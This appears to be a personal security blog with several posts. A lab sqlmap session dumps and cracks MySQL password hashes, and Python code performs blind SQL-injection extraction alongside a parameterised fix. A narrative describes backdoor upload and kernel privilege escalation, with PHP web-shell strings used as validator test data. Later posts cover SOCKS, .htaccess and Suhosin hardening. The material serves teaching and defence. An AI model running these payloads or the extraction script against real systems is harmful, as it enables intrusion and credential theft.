Manusia Tak Sempurna

I scan with sqlmap and this is the syntax:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/webku3/login.php?" --data "username=27&password=27" --dbs --level=5 --risk=3
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 22:36:50

[22:36:51] [INFO] using '/pentest/database/sqlmap/output/192.168.56.101/session' as session file
[22:36:51] [INFO] resuming injection data from session file
[22:36:51] [INFO] resuming injection data from session file
[22:36:51] [INFO] resuming back-end DBMS 'mysql 5' from session file
[22:36:51] [INFO] testing connection to the target url
[22:36:51] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: username=27' AND 4232=BENCHMARK(5000000,MD5(CHAR(110,86,112,67))) AND 'UxaS'='UxaS&password=27

Place: POST
Parameter: password
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: username=27&password=-6012' OR NOT (7812=7812) AND 'FaHO'='FaHO

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: username=27&password=27' AND 3903=BENCHMARK(5000000,MD5(CHAR(120,68,103,113))) AND 'QbLo'='QbLo
---
[22:36:51] [INFO] manual usage of POST payloads requires url encoding
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: username, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> 0
[22:36:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[22:36:58] [INFO] fetching database names
[22:36:58] [INFO] fetching number of databases
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 9
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': information_schema
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': Joomla
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': dvwa
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': mysql
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': phpmyadmin
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': test
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': webku
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': webku3
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': wordpress
available databases [9]:
[*] dvwa
[*] information_schema
[*] Joomla
[*] mysql
[*] phpmyadmin
[*] test
[*] webku
[*] webku3
[*] wordpress

[22:36:58] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.101'

[*] shutting down at: 22:36:58

Then I try to retrieve the database users and their password hashes with sqlmap:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/webku3/login.php?" --data "username=27&password=27" -D phpmyadmin -T user --password --level=5 --risk=3

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 22:37:51

[22:37:52] [INFO] using '/pentest/database/sqlmap/output/192.168.56.101/session' as session file
[22:37:52] [INFO] resuming injection data from session file
[22:37:52] [INFO] resuming injection data from session file
[22:37:52] [INFO] resuming back-end DBMS 'mysql 5' from session file
[22:37:52] [INFO] testing connection to the target url
[22:37:52] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: username=27' AND 4232=BENCHMARK(5000000,MD5(CHAR(110,86,112,67))) AND 'UxaS'='UxaS&password=27

Place: POST
Parameter: password
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: username=27&password=-6012' OR NOT (7812=7812) AND 'FaHO'='FaHO

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: username=27&password=27' AND 3903=BENCHMARK(5000000,MD5(CHAR(120,68,103,113))) AND 'QbLo'='QbLo
---

[22:37:52] [INFO] manual usage of POST payloads requires url encoding
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: username, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> 0
[22:37:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[22:37:54] [INFO] fetching database users password hashes
[22:37:54] [INFO] fetching database users
[22:37:54] [INFO] fetching number of database users
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 5
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 'root'@'localhost'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 'root'@'pakdhe-laptop'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 'root'@'127.0.0.1'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 'debian-sys-maint'@'localhost'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 'phpmyadmin'@'localhost'
[22:37:54] [INFO] fetching number of password hashes for user 'root'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 2
[22:37:54] [INFO] fetching password hashes for user 'root'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': *7B4BDBFF8519BFDF2FEBEAF893534A8163E9F170
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[22:37:54] [INFO] fetching number of password hashes for user 'debian-sys-maint'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 1
[22:37:54] [INFO] fetching password hashes for user 'debian-sys-maint'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': *896747F40953077D8AB58F8A3002427D8DC256FE
[22:37:54] [INFO] fetching number of password hashes for user 'phpmyadmin'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 1
[22:37:54] [INFO] fetching password hashes for user 'phpmyadmin'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[22:37:57] [INFO] using hash method: 'mysql_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[22:37:58] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[22:38:02] [INFO] starting dictionary attack (mysql_passwd)
[22:38:04] [INFO] found: 'root' for user: 'root'
[22:38:05] [INFO] found: 'root' for user: 'phpmyadmin'
database management system users password hashes:
[*] debian-sys-maint [1]:
    password hash: *896747F40953077D8AB58F8A3002427D8DC256FE
[*] phpmyadmin [1]:
    password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
    clear-text password: root
[*] root [2]:
    password hash: *7B4BDBFF8519BFDF2FEBEAF893534A8163E9F170
    password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
    clear-text password: root

[22:39:55] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.101'

[*] shutting down at: 22:39:55

Then I try to use sqlmap's SQL shell against the MySQL back end:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/webku3/login.php?" --data "username=27&password=27" -D phpmyadmin -T user --sql-shell --level=5 --risk=3

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 08:27:56

[08:27:56] [INFO] using '/pentest/database/sqlmap/output/192.168.56.101/session' as session file
[08:27:56] [INFO] resuming injection data from session file
[08:27:56] [INFO] resuming injection data from session file
[08:27:56] [INFO] resuming back-end DBMS 'mysql 5' from session file
[08:27:56] [INFO] testing connection to the target url
[08:27:56] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: username=27' AND 4232=BENCHMARK(5000000,MD5(CHAR(110,86,112,67))) AND 'UxaS'='UxaS&password=27

Place: POST
Parameter: password
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: username=27&password=-6012' OR NOT (7812=7812) AND 'FaHO'='FaHO

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: username=27&password=27' AND 3903=BENCHMARK(5000000,MD5(CHAR(120,68,103,113))) AND 'QbLo'='QbLo
---

[08:27:56] [INFO] manual usage of POST payloads requires url encoding
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: username, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> 1
[08:27:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[08:27:59] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> show databases;
do you want to retrieve the SQL statement output? [Y/n/a] y
[08:28:18] [INFO] fetching SQL SELECT statement query output: 'show databases;'
[08:28:18] [WARNING] running in a single-thread mode. please consider usage of --threads option to declare higher number of threads
[08:28:18] [INFO] retrieved:
sql-shell>

But it seems it can't connect. The connection itself is fine (the injection point was resumed from the session file and the --dbs run above worked). The real problem is that through a blind injection sqlmap can only infer the result of a statement it can embed as a SELECT subquery, and SHOW DATABASES is not one, so nothing is retrieved. The equivalent SELECT schema_name FROM information_schema.schemata would work here, and --dbs already produced the same list.

to be continued................
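As an added example (not the page's login.php, whose source is never shown), the following Python reproduces the boolean-based blind injection point sqlmap reported on the password parameter, shows the hardened query beside it, and then drives the vulnerable login as a true/false oracle to pull a string out character by character, which is what sqlmap is doing behind its "retrieved:" lines. The user table, its rows and the exact SQL shape are assumptions; sqlite3 stands in for the target's MySQL so it runs offline.

```python
import sqlite3

# Added example, not the page's login.php (whose source is never shown). The
# 'user' table, its rows and the SQL shape are assumptions; sqlite3 stands in
# for the target's MySQL so that this runs offline.


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (username TEXT, password TEXT)")
    db.execute("INSERT INTO user VALUES ('admin', 'secret')")
    return db


def login_vulnerable(db, username, password):
    """Login check that splices the POST fields straight into the query,
    the pattern that produces the injection points sqlmap reported."""
    sql = ("SELECT COUNT(*) FROM user WHERE username='%s' AND password='%s'"
           % (username, password))
    return db.execute(sql).fetchone()[0] > 0


def login_fixed(db, username, password):
    """Same check with bound parameters: the payload is compared as a literal
    string and never reaches the SQL parser."""
    sql = "SELECT COUNT(*) FROM user WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchone()[0] > 0


def make_oracle(db):
    """Turn the vulnerable login into a true/false oracle using the same
    payload shape as sqlmap's boolean-based blind vector on this page:
        password=-6012' OR NOT (7812=7812) AND 'FaHO'='FaHO
    AND binds tighter than OR, so the WHERE clause reduces to <cond>."""
    def oracle(cond):
        oracle.calls += 1
        payload = "-6012' OR (%s) AND 'FaHO'='FaHO" % cond
        return login_vulnerable(db, "27", payload)
    oracle.calls = 0
    return oracle


def blind_extract(oracle, max_len=32):
    """Recover admin's password one character at a time, binary-searching
    each code point through the oracle (7 requests per character for a
    7-bit range, which is why blind extraction is slow and noisy).
    unicode(substr(..)) past the end of the string is NULL, so every
    comparison is false and the search settles on 0, which ends the loop."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = ("(SELECT unicode(substr(password,%d,1)) FROM user "
                    "WHERE username='admin') > %d" % (pos, mid))
            if oracle(cond):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        result += chr(lo)
    return result


if __name__ == "__main__":
    db = make_db()
    true_case = "-6012' OR NOT (7812=7813) AND 'FaHO'='FaHO"
    false_case = "-6012' OR NOT (7812=7812) AND 'FaHO'='FaHO"
    print("vulnerable, false payload:", login_vulnerable(db, "27", false_case))
    print("vulnerable, true payload: ", login_vulnerable(db, "27", true_case))
    print("fixed, true payload:      ", login_fixed(db, "27", true_case))
    oracle = make_oracle(db)
    print("extracted:", blind_extract(oracle), "in", oracle.calls, "requests")
```

The only difference between the true and false payloads is a page that logs the user in versus one that does not; that one bit, repeated, is enough to read any value the database user can SELECT. The fix is the bound-parameter query, not filtering quotes: with placeholders the sqlmap payload is just a long password that matches nobody.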

Manusia Tak Sempurna
To exploit a server I first use a scanner to find out which applications are running on the system. After the scan I had the result, but the application was the latest version, so I could not break into the system through the application itself.

Then I just explored the web, menu by menu. I found a vulnerability in the file upload on the web: I tested uploading a picture and it succeeded, then I tried uploading a file with a .txt extension and that succeeded too. Probably the developer does not sanitize (restrict) which files can be uploaded.

Then I uploaded a backdoor that I had prepared; it uploaded successfully. Next I searched for where the file had been stored and found it. After running the backdoor I tried to exploit the kernel of the system: I searched for a kernel exploit, found one, and uploaded it through the backdoor on the web.

After that I ran the kernel exploit to gain full access as root, and it worked. Now I have full access to the system.
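The upload handler above accepted anything. As an added example (not code from the page; the target's PHP upload script is never shown), here is the validation such a handler should do, written in Python as a language-neutral check: an extension allow-list, a check that the bytes really carry that image's signature, rejection of an embedded PHP tag, and a server-chosen file name. The sample uploads are constructed inline.

```python
import os
import re
import secrets

# Added example, not code from the page. It shows the check the upload handler
# described above lacks: accept an allow-listed image extension only, confirm
# the bytes really are that image type, refuse embedded PHP, and store under a
# server-chosen name. All sample files below are constructed inline.

ALLOWED = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
# Deliberately broad: any '<?' is refused, which also catches '<?php' in a
# file whose first bytes are a valid image header (a polyglot).
PHP_MARKER = re.compile(rb"<\?(php|=)?", re.IGNORECASE)


def validate_upload(filename, content):
    """Return (ok, reason). Every rejection names the failed check."""
    base = os.path.basename(filename)
    if base != filename or ".." in base:
        return False, "path components in filename"
    # Reject double extensions outright: Apache with AddHandler/MultiViews
    # may still execute 'shell.php.jpg' as PHP.
    parts = base.lower().split(".")
    if len(parts) != 2:
        return False, "missing or multiple extensions"
    ext = parts[1]
    if ext not in ALLOWED:
        return False, "extension not allowed: " + ext
    if not content.startswith(ALLOWED[ext]):
        return False, "content does not match " + ext + " signature"
    if PHP_MARKER.search(content):
        return False, "PHP tag embedded in file body"
    return True, "ok"


def stored_name(filename):
    """Server-chosen name: random, with the validated extension; the client's
    name is never used on disk, so it cannot pick 'index.php' or similar."""
    ext = filename.lower().rsplit(".", 1)[1]
    return secrets.token_hex(16) + "." + ext


# Constructed sample uploads (not real files from the page).
SAMPLES = {
    "photo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
    "notes.txt": b"just text",
    "shell.php": b"<?php system($_GET['cmd']); ?>",
    "shell.php.jpg": b"\xff\xd8\xff\xe0" + b"<?php system($_GET['cmd']); ?>",
    "fake.jpg": b"<?php system($_GET['cmd']); ?>",
    "poly.gif": b"GIF89a" + b"<?php system($_GET['cmd']); ?>",
}


def check_all(samples=SAMPLES):
    return {name: validate_upload(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, (ok, reason) in check_all().items():
        print("%-14s %-6s %s" % (name, "ACCEPT" if ok else "REJECT", reason))
```

Even with these checks, store uploads in a directory the web server will not execute scripts from (or outside the document root and serve them through a script), since validation of content is a filter, not a guarantee.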
Manusia Tak Sempurna

SOCKS is a network protocol designed to allow clients to communicate with Internet servers through firewalls. SOCKS is typically implemented on proxy servers. It is supported as a proxy configuration option in popular Web browsers and instant messaging programs. SOCKS can also be found in some VPN implementations.
Multiple versions of the SOCKS protocol exist, including SOCKS v4 and SOCKS v5. SOCKS v4 uses TCP as its only transport, while SOCKS v5 also supports UDP, IPv6 and domain-name addressing, and adds client authentication. The base SOCKS v5 specification is RFC 1928; RFC 1929 specifies username/password authentication and RFC 1961 the GSS-API authentication method.
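As an added example (not code from the page), the Python below builds and parses the SOCKS5 messages from RFC 1928 and RFC 1929, plus a SOCKS4 CONNECT for comparison, so the exchange can be seen byte by byte: greeting, method selection, optional username/password sub-negotiation, CONNECT request and reply. The server replies are constructed inline; no proxy is contacted.

```python
import socket
import struct

# Added example, not code from the page: SOCKS5 (RFC 1928/1929) message
# builders and parsers plus a SOCKS4 CONNECT for comparison. Server replies
# used in the demo are constructed inline; nothing is sent on the network.

SOCKS5 = 0x05
NO_AUTH, USERPASS, NO_ACCEPTABLE = 0x00, 0x02, 0xFF
CMD_CONNECT = 0x01
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04
REPLY_TEXT = {
    0x00: "succeeded", 0x01: "general SOCKS server failure",
    0x02: "connection not allowed by ruleset", 0x03: "network unreachable",
    0x04: "host unreachable", 0x05: "connection refused", 0x06: "TTL expired",
    0x07: "command not supported", 0x08: "address type not supported",
}


def build_greeting(methods=(NO_AUTH,)):
    """Client -> server: VER | NMETHODS | METHODS (RFC 1928 section 3)."""
    return bytes([SOCKS5, len(methods)]) + bytes(methods)


def parse_method_selection(data):
    """Server -> client: VER | METHOD. 0xFF means no common method."""
    ver, method = data[0], data[1]
    if ver != SOCKS5:
        raise ValueError("not a SOCKS5 reply")
    if method == NO_ACCEPTABLE:
        raise ValueError("server accepted none of the offered methods")
    return method


def build_userpass_auth(username, password):
    """RFC 1929 sub-negotiation: VER=1 | ULEN | UNAME | PLEN | PASSWD.
    Sent in clear text, so it only makes sense on a trusted path."""
    u, p = username.encode(), password.encode()
    return b"\x01" + bytes([len(u)]) + u + bytes([len(p)]) + p


def build_connect(host, port):
    """CONNECT request: VER | CMD | RSV | ATYP | DST.ADDR | DST.PORT.
    Host names go as-is (ATYP 3) so the proxy resolves them, keeping DNS
    lookups off the client side."""
    try:
        addr = bytes([ATYP_IPV4]) + socket.inet_pton(socket.AF_INET, host)
    except OSError:
        try:
            addr = bytes([ATYP_IPV6]) + socket.inet_pton(socket.AF_INET6, host)
        except OSError:
            h = host.encode("idna")
            addr = bytes([ATYP_DOMAIN, len(h)]) + h
    return bytes([SOCKS5, CMD_CONNECT, 0x00]) + addr + struct.pack("!H", port)


def parse_reply(data):
    """Server reply: VER | REP | RSV | ATYP | BND.ADDR | BND.PORT.
    Returns (reply_code, reply_text, bound_addr, bound_port)."""
    ver, rep, _rsv, atyp = data[:4]
    if ver != SOCKS5:
        raise ValueError("not a SOCKS5 reply")
    if atyp == ATYP_IPV4:
        addr, rest = socket.inet_ntop(socket.AF_INET, data[4:8]), data[8:]
    elif atyp == ATYP_IPV6:
        addr, rest = socket.inet_ntop(socket.AF_INET6, data[4:20]), data[20:]
    elif atyp == ATYP_DOMAIN:
        n = data[4]
        addr, rest = data[5:5 + n].decode(), data[5 + n:]
    else:
        raise ValueError("unknown address type %d" % atyp)
    port = struct.unpack("!H", rest[:2])[0]
    return rep, REPLY_TEXT.get(rep, "unknown"), addr, port


def build_socks4_connect(ip, port, userid=""):
    """SOCKS4 CONNECT for comparison: VN=4 | CD=1 | DSTPORT | DSTIP | USERID | NUL.
    No negotiation, no UDP, IPv4 only."""
    return (b"\x04\x01" + struct.pack("!H", port)
            + socket.inet_pton(socket.AF_INET, ip) + userid.encode() + b"\x00")


if __name__ == "__main__":
    print("greeting      ", build_greeting((NO_AUTH, USERPASS)).hex())
    print("server picks  ", parse_method_selection(b"\x05\x02"))  # constructed reply
    print("userpass      ", build_userpass_auth("bob", "pw").hex())
    print("connect       ", build_connect("example.com", 443).hex())
    print("reply         ", parse_reply(b"\x05\x00\x00\x01\x7f\x00\x00\x01\x1f\x90"))
    print("socks4 connect", build_socks4_connect("10.0.0.1", 80, "user").hex())
```

After a successful reply the same TCP connection becomes the tunnel to DST.ADDR, which is why a SOCKS proxy reachable from outside is attractive to an attacker: one open proxy turns into a connection to anything the proxy host can reach.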

Manusia Tak Sempurna
.htaccess is an ASCII text file placed in a web directory (usually the document root, e.g. "public_html") that is often used to override the web server's default settings for that directory and everything below it (Apache reads it only where AllowOverride permits).
.htaccess can be used to
- block specific IP addresses
- redirect old pages to new pages
- prevent browsing (directory listing) of a directory
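As an added example (not a file from the page), an .htaccess that does the three things listed above, in the Apache 2.2 syntax matching the Apache 2.2.14 seen in the sqlmap banner earlier on this page; the addresses and paths are illustrative, and the directives assume AllowOverride allows them:

```apacheconf
# Block specific addresses (Apache 2.2 syntax; 2.4 uses "Require not ip ...").
# 203.0.113.45 and 198.51.100.0/24 are documentation addresses used as examples.
Order Allow,Deny
Allow from all
Deny from 203.0.113.45
Deny from 198.51.100.0/24

# Permanent redirect of an old page to its replacement (illustrative paths).
Redirect 301 /old-page.html /new-page.html

# No directory listing when there is no index file.
Options -Indexes

# Related hardening for an upload directory: never run anything here as PHP.
# Requires mod_php and AllowOverride Options; assumed available here.
php_flag engine off
RemoveHandler .php .phtml .php3
```

Check the result with a request from a denied address (expect 403), a request for the old URL (expect a 301 with the new Location) and a request for the bare directory (expect 403 instead of a file list).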

Manusia Tak Sempurna
Suhosin is an advanced protection system for PHP installations. It was designed to protect servers and users from known and unknown flaws in PHP applications and the PHP core. Suhosin comes in two independent parts that can be used separately or in combination. The first part is a small patch against the PHP core that implements a few low-level protections against buffer overflows or format string vulnerabilities; the second part is a powerful PHP extension that implements all the other protections.

Feature List
Engine Protection (only with patch)

  • Protects the internal memory manager against buffer overflows with Canary and SafeUnlink Protection
  • Protects Destructors of Zend Hashtables
  • Protects Destructors of Zend Linked-Lists
  • Protects the PHP core and extensions against format string vulnerabilities
  • Protects against errors in certain libc realpath() implementations

Misc Features
  • Protection Simulation mode
  • Adds the functions sha256() and sha256_file() to the PHP core
  • Adds support for CRYPT_BLOWFISH to crypt() on all platforms
  • Transparent protection of open phpinfo() pages
  • EXPERIMENTAL SQL database user protection

Runtime Protection
  • Transparent Cookie Encryption
  • Protects against different kinds of (Remote-)Include Vulnerabilities:
      disallows Remote URL inclusion (optional: black-/whitelisting), disallows inclusion of uploaded files, optionally stops directory traversal attacks
  • Allows disabling the preg_replace() /e modifier
  • Allows disabling eval()
  • Protects against infinite recursion through a configurable maximum execution depth
  • Supports per Virtual Host / Directory configurable function black- and whitelists
  • Supports a separated function black- and whitelist for evaluated code
  • Protects against HTTP Response Splitting Vulnerabilities
  • Protects against scripts manipulating the memory_limit
  • Protects PHP's superglobals against extract() and import_request_vars()
  • Adds protection against newline attacks to mail()
  • Adds protection against \0 attack on preg_replace()

Session Protection
  • Transparent encryption of session data
  • Transparent session hijacking protection
  • Protection against overlong session identifiers
  • Protection against malicious chars in session identifiers
Filtering Features

  • Filters ASCIIZ characters from user input
  • Ignores GET, POST, COOKIE variables with the following names:

              GLOBALS, _COOKIE, _ENV, _FILES, _GET, _POST, _REQUEST
              _SERVER, _SESSION, HTTP_COOKIE_VARS, HTTP_ENV_VARS
              HTTP_GET_VARS, HTTP_POST_VARS, HTTP_POST_FILES
              HTTP_RAW_POST_DATA, HTTP_SERVER_VARS, HTTP_SESSION_VARS

  • Allows enforcing limits on REQUEST variables or separated by type (GET, POST, COOKIE)

             Supports a number of variables per request limit
             Supports a maximum length of variable names [with and without indices]
             Supports a maximum length of array indices
             Supports a maximum length of variable values
             Supports a maximum depth of arrays

  • Allows only a configurable number of uploaded files
  • Supports verification of uploaded files through an external script
  • Supports automatic banning of uploaded ELF executables
  • Supports automatic banning of uploaded binary files
  • Supports automatic stripping of binary content in uploaded files
  • Configurable action on violation

                     just block violating variables
                     send HTTP response code
                     redirect the browser
                     execute another PHP script

Logging Features

  • Supports multiple log devices (syslog, SAPI module error log, external logging script)
  • Supports freely configurable syslog facility and priority
  • Supports log device separated selection of alert types to log
  • Alerts contain filename and linenumber that triggered it
  • Alerts contain the IP address of the user triggering it
  • The IP address can also be extracted from X-Forwarded-For HTTP headers (e.g. for reverse proxy setups)
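As an added example (not from the page or the Suhosin project's documentation), a php.ini fragment that switches on the extension-side features from the list above. The directive names are Suhosin's; the values, the blacklisted functions, the key and the script path are illustrative choices, not the project's defaults:

```ini
; Added example: php.ini fragment enabling Suhosin extension features.
; Values below are illustrative, not Suhosin defaults.

; Misc: start in simulation mode so violations are logged but not blocked;
; set to Off once the log is clean.
suhosin.simulation = On

; Runtime protection
suhosin.executor.include.whitelist =                  ; empty: no remote URL inclusion
suhosin.executor.disable_eval = On
suhosin.executor.disable_emodifier = On               ; preg_replace() /e
suhosin.executor.max_depth = 200                      ; recursion limit
suhosin.executor.func.blacklist = system,exec,shell_exec,passthru,popen,proc_open
suhosin.executor.eval.blacklist = include,include_once,require,require_once
suhosin.mail.protect = 1                              ; newline checks in mail()
suhosin.memory_limit = 128M                           ; scripts may not raise above this

; Session and cookie protection
suhosin.session.encrypt = On
suhosin.session.cryptua = On                          ; bind session data to User-Agent
suhosin.session.max_id_length = 128
suhosin.cookie.encrypt = On
suhosin.cookie.cryptkey = CHANGE-ME-to-a-long-random-string   ; placeholder

; Filtering: per-request limits and the action on violation
suhosin.request.max_vars = 200
suhosin.post.max_vars = 200
suhosin.get.max_value_length = 512
suhosin.request.max_array_depth = 10
suhosin.filter.action = 403                           ; respond 403 instead of serving the script

; Uploads
suhosin.upload.max_uploads = 5
suhosin.upload.disallow_elf = On
suhosin.upload.disallow_binary = On
suhosin.upload.verification_script = /usr/local/bin/check-upload.sh   ; assumed path

; Logging
suhosin.log.syslog = 511                              ; S_ALL: every alert class
suhosin.log.use-x-forwarded-for = Off                 ; On only behind a trusted reverse proxy
```

Leave suhosin.simulation on for a while and read the syslog output before enforcing: function and include blacklists will otherwise break legitimate code silently, and use-x-forwarded-for should stay off unless a reverse proxy you control sets the header, since clients can send it themselves.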